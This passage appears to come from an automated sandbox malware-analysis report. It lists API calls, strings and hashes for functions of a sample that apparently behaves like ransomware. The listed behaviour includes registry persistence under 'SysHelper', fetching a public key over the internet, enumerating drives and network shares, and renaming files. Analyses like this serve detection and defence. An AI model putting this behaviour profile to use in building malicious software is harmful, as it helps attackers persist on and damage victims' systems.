                                                                                                                            • API String ID: 2864494435-54166481
                                                                                                                            • Opcode ID: b443970f98c44e8e3b015720f3e3d0ecd4582eb0f3f71ade274a708102e977c5
                                                                                                                            • Instruction ID: 7c1d9cbdc844d2066280f59721cb396b14e817b3c99122331cf76a8b439d4e7f
                                                                                                                            • Opcode Fuzzy Hash: b443970f98c44e8e3b015720f3e3d0ecd4582eb0f3f71ade274a708102e977c5
                                                                                                                            • Instruction Fuzzy Hash: FC9183B1D003199BDF20EFA5C9857AFB7B5BF04304F14052BE855A3241F779AA18CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 0046F338
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0046F353
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                            • API String ID: 2574300362-2555811374
                                                                                                                            • Opcode ID: 62695cabbdbed57a1b501f5f0a513200bd0048d412bc2de0d89bf0ae8b423565
                                                                                                                            • Instruction ID: 159db3e0fdd4b31f7a8eaf3284d49824f814c6c2a87dbf4b7ffd28ca26f40d36
                                                                                                                            • Opcode Fuzzy Hash: 62695cabbdbed57a1b501f5f0a513200bd0048d412bc2de0d89bf0ae8b423565
                                                                                                                            • Instruction Fuzzy Hash: BEC16F71D01209EBDF00DFA4DD49BDEBBB5BF14308F10442AE405B7291E7B99A19CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0047E6D4), ref: 0046C6C2
                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0046C6F3
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0046C700
                                                                                                                            • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0046C725
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0046C72E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseValue$OpenQuery
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                            • API String ID: 3962714758-1667468722
                                                                                                                            • Opcode ID: d935002d961569eaede09362cc8d224887099ea45f02de50f73a2653c1c6e0c9
                                                                                                                            • Instruction ID: 47a4b7530c2c47492d265e308e2820d872026311c0572f8f5994cf9781f23334
                                                                                                                            • Opcode Fuzzy Hash: d935002d961569eaede09362cc8d224887099ea45f02de50f73a2653c1c6e0c9
                                                                                                                            • Instruction Fuzzy Hash: 6E111E75940208FBDB209F90CC4AFEEBF78FF14705F104195EA00B2191E7B15A19AB55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0047E707
                                                                                                                              • Part of subcall function 0046C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0046C51B
                                                                                                                            • InternetOpenW.WININET ref: 0047E743
                                                                                                                            • _wcsstr.LIBCMT ref: 0047E7AE
                                                                                                                            • _memmove.LIBCMT ref: 0047E838
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0047E90A
                                                                                                                            • lstrcatW.KERNEL32(?,&first=false), ref: 0047E93D
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0047E954
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0047E96F
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047E98C
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047E9A3
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0047E9CD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F3
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F6
                                                                                                                            • _strstr.LIBCMT ref: 0047EA36
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EA59
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EA74
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EA82
                                                                                                                            • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0047EA92
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EAA4
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EABA
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EAC8
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 0047EAE3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EB5B
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EB7C
                                                                                                                            • _malloc.LIBCMT ref: 0047EB86
                                                                                                                            • _memset.LIBCMT ref: 0047EB94
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0047EBAE
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EBB6
                                                                                                                            • _strstr.LIBCMT ref: 0047EBDA
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EC00
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EC24
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EC32
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                            • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                            • API String ID: 2805819797-1771568745
                                                                                                                            • Opcode ID: 920ab47d1aa3f86d324baca30e2bf9adcbea66ea8b6ea5862a5b8517ffcdc499
                                                                                                                            • Instruction ID: 1c074ea7080a6dd3ca8b1fc97f1e384f3ed11f6aa9947bcdf21ffc5df3574b87
                                                                                                                            • Opcode Fuzzy Hash: 920ab47d1aa3f86d324baca30e2bf9adcbea66ea8b6ea5862a5b8517ffcdc499
                                                                                                                            • Instruction Fuzzy Hash: 02019230448381AAD630EF119C05BDF7B9CAF55708F04885EF98892182EB78920DC7AB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00471B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM(?,?,?,?,0047EE2F), ref: 00471B1E
                                                                                                                            • timeGetTime.WINMM(?,?,0047EE2F), ref: 00471B29
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471B4C
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00471B5C
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471B6A
                                                                                                                            • Sleep.KERNEL32(00000064,?,?,0047EE2F), ref: 00471B72
                                                                                                                            • timeGetTime.WINMM(?,?,0047EE2F), ref: 00471B78
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3697694649-0
                                                                                                                            • Opcode ID: 201cb8417f29f97518eb8715fa11cd0b52ac85b920dbc2a61c21f35a4a8d9be7
                                                                                                                            • Instruction ID: e22111e1a8fc4ac874f932cd817cc5f8ff663f5d2b10c1ffdd4ba5ed3842f039
                                                                                                                            • Opcode Fuzzy Hash: 201cb8417f29f97518eb8715fa11cd0b52ac85b920dbc2a61c21f35a4a8d9be7
                                                                                                                            • Instruction Fuzzy Hash: 3A018832A40319A6DB20D7E99C45FEEB76CBF18B40F044466F704B7191E674B905CBE9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0046C51B
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0046C539
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 29327785-2616962270
                                                                                                                            • Opcode ID: 5403806752086b01698c97b37d8ebb0a451db5805923036113c57cd58930fa27
                                                                                                                            • Instruction ID: 45748298a9b2119e8af203546cdad32feeb125941ba6ea97c4375ee677fe02b2
                                                                                                                            • Opcode Fuzzy Hash: 5403806752086b01698c97b37d8ebb0a451db5805923036113c57cd58930fa27
                                                                                                                            • Instruction Fuzzy Hash: 43110AB2B4122833D930756A6C87FEF775C9F52B26F0004A7FE0CD2142B5AA995942E6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0047BAAD
                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0047BABE
                                                                                                                            • UpdateWindow.USER32(00000000), ref: 0047BAC5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateShowUpdate
                                                                                                                            • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                            • API String ID: 2944774295-3503800400
                                                                                                                            • Opcode ID: 210611b276f7045e50f6d2029047f6ffd23811cd4b8924b9dd051efc836933f7
                                                                                                                            • Instruction ID: cb306d8098a1dfe9ad6d2ff6ae07a41a6921f64a229ffaf82036fab704ca95e4
                                                                                                                            • Opcode Fuzzy Hash: 210611b276f7045e50f6d2029047f6ffd23811cd4b8924b9dd051efc836933f7
                                                                                                                            • Instruction Fuzzy Hash: A7E04F3168172077E33197147C0BF9A2D14FB22F20F30440AFA047A2D1C6E56D46AADC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00470BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00470C12
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00470C39
                                                                                                                            • _memset.LIBCMT ref: 00470C4C
                                                                                                                            • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00470C63
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 364255426-0
                                                                                                                            • Opcode ID: c1be363a87b4e176a6ba887e7f39adefd11c2f389f707559f0275214928ea752
                                                                                                                            • Instruction ID: 63a4e8f6962ec392745d8534c2be191d99f75d06ba2b00070369b7ec8858da79
                                                                                                                            • Opcode Fuzzy Hash: c1be363a87b4e176a6ba887e7f39adefd11c2f389f707559f0275214928ea752
                                                                                                                            • Instruction Fuzzy Hash: A5919C75608341CFD728DF68C891BABB7E1FF84704F14891EE48A87381E778A944CB5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00470A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLogicalDrives.KERNEL32 ref: 00470A75
                                                                                                                            • SetErrorMode.KERNEL32(00000001,00560234,00000002), ref: 00470AE2
                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 00470AF9
                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00470B02
                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 00470B1B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2560635915-0
                                                                                                                            • Opcode ID: fafd4ab57703665de094fc7977b709d23a5b65ffd38a63ffe95fa6b45792b06d
                                                                                                                            • Instruction ID: bd8aab77d4dc06a575ef99882456f81d4586d1f62c398e00fd53c594da8c4aeb
                                                                                                                            • Opcode Fuzzy Hash: fafd4ab57703665de094fc7977b709d23a5b65ffd38a63ffe95fa6b45792b06d
                                                                                                                            • Instruction Fuzzy Hash: 6C41AF71109340DFC720DF68C895B5FBBE4BF95718F500A1EF089962A2D7B99604CB97
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 0046F125
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 0046F198
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000), ref: 0046F1A1
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0046F1A8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1421093161-0
                                                                                                                            • Opcode ID: 7d5ab4d2d96e0e1bd2acde6082eacfdd07d784fb08f00182213ab1a93a2dfd92
                                                                                                                            • Instruction ID: e030ddfde6c482a8137554f480b67242852a31fb6a3f16ad448db17ff252fd5b
                                                                                                                            • Opcode Fuzzy Hash: 7d5ab4d2d96e0e1bd2acde6082eacfdd07d784fb08f00182213ab1a93a2dfd92
                                                                                                                            • Instruction Fuzzy Hash: 0F314535900104EBDB14AF68DC4ABEF7B78EF06704F10812AF815672C1E7796E49CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0047B1BA
                                                                                                                              • Part of subcall function 004711C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0047120F
                                                                                                                              • Part of subcall function 004711C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00471228
                                                                                                                              • Part of subcall function 004711C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0047123D
                                                                                                                              • Part of subcall function 004711C0: MoveFileW.KERNEL32(00000000,?), ref: 00471277
                                                                                                                              • Part of subcall function 0047BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0047BA4A
                                                                                                                              • Part of subcall function 0047BA10: RegisterClassExW.USER32(00000030), ref: 0047BA73
                                                                                                                              • Part of subcall function 0047BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0047BAAD
                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0047B4B3
                                                                                                                            • TranslateMessage.USER32(?), ref: 0047B4CD
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047B4D7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
